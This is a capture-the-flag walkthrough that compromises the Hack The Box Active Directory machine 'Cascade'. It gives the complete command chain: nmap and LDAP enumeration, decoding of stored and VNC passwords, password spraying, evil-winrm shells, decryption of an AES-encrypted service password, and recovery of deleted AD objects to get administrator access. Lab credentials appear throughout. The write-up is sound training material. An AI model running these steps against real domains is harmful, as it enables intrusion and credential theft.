Cascade
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.182 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p53,88,135,139,389,445,636,3268,3269,5985,49154,49155,49157,49158,49170 10.10.10.182 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
The machine is probably a domain controller, and as seen with crackmapexec, the domain name is cascade.local.
crackmapexec smb 10.10.10.182
Let's add it to the /etc/hosts file.
nano /etc/hosts
We could try to get a list of users using rpcclient.
rpcclient -N -U '' 10.10.10.182 -c "enumdomusers" | grep -oP '[.*]' | awk '{print $1}' | tr -d "[]" > users
Exploitation
As port 389 is open, let's enumerate the DC via the LDAP service.
ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=person)'
The r.thompson user has one attribute called cascadeLegacyPwd with one encoded password.
echo 'clk0bjVldmE=' | base64 -d; echo
Now we could try to enumerate SMB shares with these credentials.
crackmapexec smb 10.10.10.182 -u 'r.thompson' -p 'rY4n5eva' --shares
We can read the Data share. Let's mount it to our local system.
mkdir /mnt/Data
mount -t cifs //10.10.10.182/Data /mnt/Data/ -o username=r.thompson,password=rY4n5eva,domain=cascade.local,rw
The Data share has a few files.
tree -fas /mnt/Data
The most interesting ones are the Meeting_Notes_June_2018.html which says that the TempUser user had the same password as the administrator.
cat /mnt/Data/IT/Email\ Archives/Meeting_Notes_June_2018.html
And the VNC Install.reg file which seems to have a hexadecimal encoded password for the user.
cat /mnt/Data/IT/Temp/s.smith/VNC\ Install.reg
As it seems to be a VNC encrypted password, we can decrypt it with the following command I found here.
echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
We have a password, but we don't know whose user it is. Let's password-spray it across all the users we found earlier.
crackmapexec smb 10.10.10.182 -u users -p 'sT333ve2'
The password is valid for the s.smith user, which seems to be a member of the Remote Management Users group because we can get a shell with evil-winrm and take the user flag.
evil-winrm -i 10.10.10.182 -u 's.smith' -p 'sT333ve2'
Privilege Escalation
He has access to one more share from the SMB server called Audit$.
crackmapexec smb 10.10.10.182 -u 's.smith' -p 'sT333ve2' --shares
Let's mount it to our local system.
mkdir /mnt/Audit$
mount -t cifs //10.10.10.182/Audit$ /mnt/Audit$/ -o username=s.smith,password=sT333ve2,domain=cascade.local,rw
The share has what seems to be the files needed for the CascAudit.exe binary to work properly.
tree -fas /mnt/Audit$/
There is one .db file, which works with SQLite 3.
file /mnt/Audit$/DB/Audit.db
The database has three tables, and the Ldap table has one bas64 encoded password for the ArkSvc user.
sqlite3 /mnt/Audit$/DB/Audit.db
But the password seems to be encrypted.
echo 'BQO5l5Kj9MdErXx6Q6AGOw==' | base64 -d; echo
Let's reverse engineer the CascAudit.exe binary with dotPeek to its source code and see what it is doing. Transfer CascAudit.exe and CascCrypto.dll to a Windows machine with dotPeek installed, and open both files with it.
The CascAudit.exe source code has a key that seems to be used to encrypt and decrypt passwords.
On the other hand, the CascCtypto.dll source code shows that it encrypts the passwords using AES CDC, with a specified IV key.
We can use online tools such as devglan.com to decrypt the encrypted password we found in the database using the IV key and the secret key.
Let's use these credentials to get a shell as arksvc.
evil-winrm -i 10.10.10.182 -u 'arksvc' -p 'w3lc0meFr31nd'
As we can see, the arksvc user is a member of the AD Recycle Bin group, which means that it has permission to read deleted AD objects.
net user arksvc
Let's check deleted AD objects with the following command. There is one base64 encoded password for the TempAdmin user.
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
Decode the base64 string to get the password.
echo 'YmFDVDNyMWFOMDBkbGVz' | base64 -d; echo
If you remember, there was a note in the Data share that said the password of the TempAdmin user was the same one as the administrator user. So we can get a shell as administrator, and then all we have to do is reap the harvest and take the root flag.
evil-winrm -i 10.10.10.182 -u 'administrator' -p 'baCT3r1aN00dles'
Last updated
Was this helpful?